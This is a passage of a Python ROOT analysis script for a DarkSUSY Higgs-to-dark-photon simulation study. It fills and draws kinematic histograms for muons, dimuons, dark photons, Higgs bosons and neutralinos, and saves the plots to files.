h_gammaD_1_p.Fill( sqrt( gammaDs[0][1]*gammaDs[0][1] + gammaDs[0][2]*gammaDs[0][2] + gammaDs[0][3]*gammaDs[0][3] ) )
h_gammaD_2_p.Fill( sqrt( gammaDs[1][1]*gammaDs[1][1] + gammaDs[1][2]*gammaDs[1][2] + gammaDs[1][3]*gammaDs[1][3] ) )
h_gammaD_1_M.Fill( gammaDs[0][5] )
h_gammaD_1_M.Fill( gammaDs[1][5] )
h_gammaD_1_pZ.Fill( fabs(gammaDs[0][3]) )
h_gammaD_2_pZ.Fill( fabs(gammaDs[1][3]) )
h_gammaD_1_Eta.Fill( getEta(gammaDs[0][3], sqrt( gammaDs[0][1]*gammaDs[0][1] + gammaDs[0][2]*gammaDs[0][2] + gammaDs[0][3]*gammaDs[0][3] ) ) )
h_gammaD_1_Phi.Fill( gammaDs[0][8] )
h_gammaD_2_Eta.Fill( getEta(gammaDs[1][3], sqrt( gammaDs[1][1]*gammaDs[1][1] + gammaDs[1][2]*gammaDs[1][2] + gammaDs[1][3]*gammaDs[1][3] ) ) )
h_gammaD_2_Phi.Fill( gammaDs[1][8] )
gammaDPlotCounter = 1
if len(muons) == 4:
muons_sorted_pT = sorted(muons, key=itemgetter(6), reverse=True)
muons = muons_sorted_pT
h_muon_pT_0.Fill( muons[0][6] )
h_muon_pT_1.Fill( muons[1][6] )
h_muon_pT_2.Fill( muons[2][6] )
h_muon_pT_3.Fill( muons[3][6] )
h_muon_eta_0.Fill( muons[0][7] )
h_muon_eta_1.Fill( muons[1][7] )
h_muon_eta_2.Fill( muons[2][7] )
h_muon_eta_3.Fill( muons[3][7] )
h_muon_phi_0.Fill( muons[0][8] )
h_muon_phi_1.Fill( muons[1][8] )
h_muon_phi_2.Fill( muons[2][8] )
h_muon_phi_3.Fill( muons[3][8] )
h_muon_p_0.Fill( sqrt( muons[0][1]*muons[0][1] + muons[0][2]*muons[0][2] + muons[0][3]*muons[0][3] ) )
h_muon_p_1.Fill( sqrt( muons[1][1]*muons[1][1] + muons[1][2]*muons[1][2] + muons[1][3]*muons[1][3] ) )
h_muon_p_2.Fill( sqrt( muons[2][1]*muons[2][1] + muons[2][2]*muons[2][2] + muons[2][3]*muons[2][3] ) )
h_muon_p_3.Fill( sqrt( muons[3][1]*muons[3][1] + muons[3][2]*muons[3][2] + muons[3][3]*muons[3][3] ) )
h_muon_pZ_0.Fill( muons[0][3] )
h_muon_pZ_1.Fill( muons[1][3] )
h_muon_pZ_2.Fill( muons[2][3] )
h_muon_pZ_3.Fill( muons[3][3] )
parent = muons[1][9] #this is an arbitrary choice to find real dimuons
for i in range(0, len(muons) ):
if parent == muons[i][9]:
DimuonIndex1.append(i)
else:
DimuonIndex2.append(i)
px1 = muons[DimuonIndex1[0]][1] + muons[DimuonIndex1[1]][1]
py1 = muons[DimuonIndex1[0]][2] + muons[DimuonIndex1[1]][2]
pz1 = muons[DimuonIndex1[0]][3] + muons[DimuonIndex1[1]][3]
e1 = muons[DimuonIndex1[0]][4] + muons[DimuonIndex1[1]][4]
px2 = muons[DimuonIndex2[0]][1] + muons[DimuonIndex2[1]][1]
py2 = muons[DimuonIndex2[0]][2] + muons[DimuonIndex2[1]][2]
pz2 = muons[DimuonIndex2[0]][3] + muons[DimuonIndex2[1]][3]
e2 = muons[DimuonIndex2[0]][4] + muons[DimuonIndex2[1]][4]
bamV4_1 = ROOT.TLorentzVector(px1, py1, pz1, e1)
bamV4_2 = ROOT.TLorentzVector(px2, py2, pz2, e2)
bamDimuons.append(( bamV4_1.Px(), bamV4_1.Py(), bamV4_1.Pz(), bamV4_1.E(), bamV4_1.M(), bamV4_1.Pt(), bamV4_1.Eta(), bamV4_1.Phi() ))
bamDimuons.append(( bamV4_2.Px(), bamV4_2.Py(), bamV4_2.Pz(), bamV4_2.E(), bamV4_2.M(), bamV4_2.Pt(), bamV4_2.Eta(), bamV4_2.Phi() ))
bamDimuons_Sorted_M = sorted(bamDimuons, key=itemgetter(4), reverse=True)
bamDimuons = bamDimuons_Sorted_M
h_m1_vs_m2.Fill(bamDimuons[0][4],bamDimuons[1][4])
h_m1.Fill(bamDimuons[0][4])
h_m2.Fill(bamDimuons[1][4])
bamDimuons_Sorted_pT = sorted(bamDimuons, key=itemgetter(5), reverse=True)
bamDimuons = bamDimuons_Sorted_pT
h_dimuon_1_pT.Fill(bamDimuons[0][5])
h_dimuon_2_pT.Fill(bamDimuons[1][5])
h_dimuon_1_pZ.Fill(bamDimuons[0][2])
h_dimuon_2_pZ.Fill(bamDimuons[1][2])
h_dimuon_1_p.Fill(sqrt( bamDimuons[0][0]*bamDimuons[0][0] + bamDimuons[0][1]*bamDimuons[0][1] + bamDimuons[0][2]*bamDimuons[0][2] ))
h_dimuon_2_p.Fill(sqrt( bamDimuons[1][0]*bamDimuons[1][0] + bamDimuons[1][1]*bamDimuons[1][1] + bamDimuons[1][2]*bamDimuons[1][2] ))
h_dimuon_1_Eta.Fill(bamDimuons[0][6])
h_dimuon_2_Eta.Fill(bamDimuons[1][6])
h_dimuon_1_Phi.Fill(bamDimuons[0][7])
h_dimuon_2_Phi.Fill(bamDimuons[1][7])
parent = muons[1][9] #this is an arbitrary choice to find the fake dimuons
charge = muons[1][0]
for i in range(0, len(muons) ):
if parent != muons[i][9] and charge != muons[i][0]:
FakeIndex1.append(i)
FakeIndex1.append(1)
for j in range(0, len(muons) ):
if j != FakeIndex1[0] and j != FakeIndex1[1]:
FakeIndex2.append(j)
Fakepx1 = muons[FakeIndex1[0]][1] + muons[FakeIndex1[1]][1]
Fakepy1 = muons[FakeIndex1[0]][2] + muons[FakeIndex1[1]][2]
Fakepz1 = muons[FakeIndex1[0]][3] + muons[FakeIndex1[1]][3]
Fakee1 = muons[FakeIndex1[0]][4] + muons[FakeIndex1[1]][4]
Fakepx2 = muons[FakeIndex2[0]][1] + muons[FakeIndex2[1]][1]
Fakepy2 = muons[FakeIndex2[0]][2] + muons[FakeIndex2[1]][2]
Fakepz2 = muons[FakeIndex2[0]][3] + muons[FakeIndex2[1]][3]
Fakee2 = muons[FakeIndex2[0]][4] + muons[FakeIndex2[1]][4]
fakeV4_1 = ROOT.TLorentzVector(Fakepx1, Fakepy1, Fakepz1, Fakee1)
fakeV4_2 = ROOT.TLorentzVector(Fakepx2, Fakepy2, Fakepz2, Fakee2)
FakeDimuons.append(( fakeV4_1.Px(), fakeV4_1.Py(), fakeV4_1.Pz(), fakeV4_1.E(), fakeV4_1.M(), fakeV4_1.Pt(), fakeV4_1.Eta(), fakeV4_1.Phi() ))
FakeDimuons.append(( fakeV4_2.Px(), fakeV4_2.Py(), fakeV4_2.Pz(), fakeV4_2.E(), fakeV4_2.M(), fakeV4_2.Pt(), fakeV4_2.Eta(), fakeV4_2.Phi() ))
h_dimuon_m_fake_log_0.Fill(FakeDimuons[0][4])
h_dimuon_m_fake_log_0.Fill(FakeDimuons[1][4])
h_dimuon_m_fake_0.Fill(FakeDimuons[0][4])
h_dimuon_m_fake_0.Fill(FakeDimuons[1][4])
# is1SelMu17 = False
# for i in range(0, len(muons) ):
# if muons[i][6] >= 17. and abs(muons[i][7]) <= 0.9: is1SelMu17 = True
#
# is4SelMu8 = False
# nSelMu8 = 0
# for i in range(0, len(muons) ):
# if muons[i][6] >= 8. and abs(muons[i][7]) <= 2.4: nSelMu8 = nSelMu8 + 1
# if nSelMu8 == 4: is4SelMu8 = True
#
# if is1SelMu17 and is4SelMu8:
# for i in range(0, len(muons) ):
# for j in range(i+1, len(muons) ):
# if muons[i][0] * muons[j][0] < 0:
# px = muons[i][1] + muons[j][1]
# py = muons[i][2] + muons[j][2]
# pz = muons[i][3] + muons[j][3]
# E = muons[i][4] + muons[j][4]
# v4 = ROOT.TLorentzVector(px, py, pz, E)
# dimuons.append(( i, j, v4.Px(), v4.Py(), v4.Pz(), v4.E(), v4.M(), v4.Pt(), v4.Eta(), v4.Phi() ))
# dimuons_sorted_M = sorted(dimuons, key=itemgetter(6), reverse=True)
# dimuons = dimuons_sorted_M
# # print "Dimuons:", dimuons
# h_dimuon_m_0.Fill( dimuons[0][6] )
# h_dimuon_m_1.Fill( dimuons[1][6] )
# h_dimuon_m_2.Fill( dimuons[2][6] )
# h_dimuon_m_3.Fill( dimuons[3][6] )
#
# h_dimuon_m_log_0.Fill( dimuons[0][6] )
# h_dimuon_m_log_1.Fill( dimuons[1][6] )
# h_dimuon_m_log_2.Fill( dimuons[2][6] )
# h_dimuon_m_log_3.Fill( dimuons[3][6] )
#
# #print dimuons[0][6]
# #print float(mass_GammaD_Legend)
# #if dimuons[0][6] > float(mass_GammaD_Legend): print "fake"
# #if dimuons[0][6] <= float(mass_GammaD_Legend): print "real"
# if dimuons[0][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[0][6])
# if dimuons[0][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[0][6])
# if dimuons[1][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[1][6])
# if dimuons[1][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[1][6])
# if dimuons[2][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[2][6])
# if dimuons[2][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[2][6])
# if dimuons[3][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[3][6])
# if dimuons[3][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[3][6])
#
# if dimuons[0][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[0][6])
# if dimuons[0][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[0][6])
# if dimuons[1][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[1][6])
# if dimuons[1][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[1][6])
# if dimuons[2][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[2][6])
# if dimuons[2][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[2][6])
# if dimuons[3][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[3][6])
# if dimuons[3][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[3][6])
# dimuons5GeV = []
# for i in range(0, len(dimuons)):
# # select only dimuons with invariant mass less than 5 GeV
# if dimuons[i][6] < 5.0: dimuons5GeV.append( dimuons[i] )
#
# nDimuons5GeV = len(dimuons5GeV)
#
# is2DiMuons = False
# nMuJetsContainMu17 = 0
# m_threshold_Mu17_pT = 17.0
# m_threshold_Mu17_eta = 0.9
# m_randomSeed = 1234
# if nDimuons5GeV == 2:
# # select only dimuons that do NOT share muons
# if dimuons5GeV[0][0] != dimuons5GeV[1][0] and dimuons5GeV[0][0] != dimuons5GeV[1][1] and dimuons5GeV[0][1] != dimuons5GeV[1][1] and dimuons5GeV[0][1] != dimuons5GeV[1][0]:
# isDimuon0ContainMu17 = False
# if ( muons[ dimuons5GeV[0][0] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[0][0] ][7] < m_threshold_Mu17_eta ) or ( muons[ dimuons5GeV[0][1] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[0][1] ][7] < m_threshold_Mu17_eta ):
# isDimuon0ContainMu17 = True
# if ( muons[ dimuons5GeV[1][0] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[1][0] ][7] < m_threshold_Mu17_eta ) or ( muons[ dimuons5GeV[1][1] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[1][1] ][7] < m_threshold_Mu17_eta ):
# isDimuon1ContainMu17 = True
# if isDimuon0ContainMu17 == True and isDimuon1ContainMu17 == False:
# is2DiMuons = True
# muJetC = dimuons5GeV[0]
# muJetF = dimuons5GeV[1]
# elif isDimuon0ContainMu17 == False and isDimuon1ContainMu17 == True:
# is2DiMuons = True
# muJetC = dimuons5GeV[1]
# muJetF = dimuons5GeV[0]
# elif isDimuon0ContainMu17 == True and isDimuon1ContainMu17 == True:
# is2DiMuons = True
# if(ROOT.TRandom3(m_randomSeed).Integer(2) == 0):
# muJetC = dimuons5GeV[0]
# muJetF = dimuons5GeV[1]
# else:
# muJetC = dimuons5GeV[1]
# muJetF = dimuons5GeV[0]
# else:
# is2DiMuons = False
#
# is2DiMuonsMassOK = False
# if is2DiMuons:
# massC = muJetC[6]
# massF = muJetF[6]
# h_m1_vs_m2.Fill(massC, massF)
# h_m1.Fill( massC )
# h_m2.Fill( massF )
# if abs(massC-massF) < (0.13 + 0.065*(massC+massF)/2.0):
# is2DiMuonsMassOK = True
#
# if is2DiMuonsMassOK == True:
# nEventsOK = nEventsOK + 1
print "nEvents = ", nEvents
print "nEventsOK = ", nEventsOK
################################################################################
# Draw histograms
################################################################################
Etmiss_dummy.Draw()
Etmiss.DrawNormalized("same")
scaleAxisY(Etmiss,Etmiss_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.C")
h_higgs_pT_dummy.Draw()
h_higgs_pT.DrawNormalized("same")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.C")
h_higgs_pZ_dummy.Draw()
#h_higgs_pZ.DrawNormalized("same")
plotOverflow(h_higgs_pZ)
scaleAxisY(h_higgs_pZ,h_higgs_pZ_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.C")
#h_higgs_Eta_dummy.Draw()
#h_higgs_Eta.DrawNormalized("same")
#info.Draw()
#txtHeader.Draw()
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.png")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.png")
h_higgs_Phi_dummy.Draw()
h_higgs_Phi.DrawNormalized("same")
#scaleAxisY(h_higgs_Phi,h_higgs_Phi_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.C")
cnv.SetLogx()
h_higgs_M_dummy.Draw()
h_higgs_M_dummy.SetNdivisions(10)
h_higgs_M_dummy.GetXaxis().SetMoreLogLabels()
h_higgs_M_dummy.Draw("same")
h_higgs_M.DrawNormalized("same")
h_higgs_M.GetXaxis().SetMoreLogLabels()
h_higgs_M.DrawNormalized("same")
info.Draw()
txtHeader.Draw()
h_higgs_M_dummy.SetNdivisions(10)
h_higgs_M_dummy.GetXaxis().SetMoreLogLabels()
h_higgs_M_dummy.Draw("same")
h_higgs_M.DrawNormalized("same")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.C")
cnv.SetLogx(0)
h_higgs_p_dummy.Draw()
#h_higgs_p.DrawNormalized("same")
plotOverflow(h_higgs_p)
scaleAxisY(h_higgs_p,h_higgs_p_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.C")
h_n1_1_pT_dummy.Draw()
h_n1_1_pT.DrawNormalized("same")
h_n1_2_pT.DrawNormalized("same")
scaleAxisY(h_n1_1_pT, h_n1_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_pT,"1st neutralino","L")
legend.AddEntry(h_n1_2_pT,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.C")
h_n1_1_pZ_dummy.Draw()
plotOverflow(h_n1_1_pZ)
plotOverflow(h_n1_2_pZ)
scaleAxisY(h_n1_1_pZ,h_n1_1_pZ_dummy)
#h_n1_1_pZ.DrawNormalized("same")
#h_n1_2_pZ.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_pZ,"1st neutralino","L")
legend.AddEntry(h_n1_2_pZ,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.C")
h_n1_1_Eta_dummy.Draw()
h_n1_1_Eta.DrawNormalized("same")
h_n1_2_Eta.DrawNormalized("same")
scaleAxisY(h_n1_1_Eta,h_n1_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_Eta,"1st neutralino","L")
legend.AddEntry(h_n1_2_Eta,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.C")
h_n1_1_Phi_dummy.Draw()
h_n1_1_Phi.DrawNormalized("same")
h_n1_2_Phi.DrawNormalized("same")
scaleAxisY(h_n1_1_Phi,h_n1_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_Phi,"1st neutralino","L")
legend.AddEntry(h_n1_2_Phi,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.C")
h_n1_1_p_dummy.Draw()
plotOverflow(h_n1_1_p)
plotOverflow(h_n1_2_p)
scaleAxisY(h_n1_1_p,h_n1_1_p_dummy)
#h_n1_1_p.DrawNormalized("same")
#h_n1_2_p.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_p,"1st neutralino","L")
legend.AddEntry(h_n1_2_p,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.C")
h_n1_1_M_dummy.Draw()
h_n1_1_M.DrawNormalized("same")
#h_n1_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_n1_1_M,"1st neutralino (leading p_{T})","L")
#legend.AddEntry(h_n1_2_M,"2nd neutralino","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.C")
h_nD_1_pT_dummy.Draw()
#h_nD_1_pT.DrawNormalized("same")
#h_nD_2_pT.DrawNormalized("same")
plotOverflow(h_nD_1_pT)
plotOverflow(h_nD_2_pT)
scaleAxisY(h_nD_2_pT,h_nD_1_pT)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_pT,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_pT,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.C")
h_nD_1_pZ_dummy.Draw()
h_nD_1_pZ.DrawNormalized("same")
h_nD_2_pZ.DrawNormalized("same")
scaleAxisY(h_nD_2_pZ,h_nD_1_pZ_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_pZ,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_pZ,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.C")
h_nD_1_Eta_dummy.Draw()
h_nD_1_Eta.DrawNormalized("same")
h_nD_2_Eta.DrawNormalized("same")
scaleAxisY(h_nD_1_Eta,h_nD_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_Eta,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_Eta,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.C")
h_nD_1_Phi_dummy.Draw()
h_nD_1_Phi.DrawNormalized("same")
h_nD_2_Phi.DrawNormalized("same")
scaleAxisY(h_nD_1_Phi,h_nD_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_Phi,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_Phi,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.C")
h_nD_1_p_dummy.Draw()
h_nD_1_p.DrawNormalized("same")
h_nD_2_p.DrawNormalized("same")
scaleAxisY(h_nD_2_p,h_nD_1_p_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_p,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_p,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.C")
h_nD_1_M_dummy.Draw()
h_nD_1_M.DrawNormalized("same")
#h_nD_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
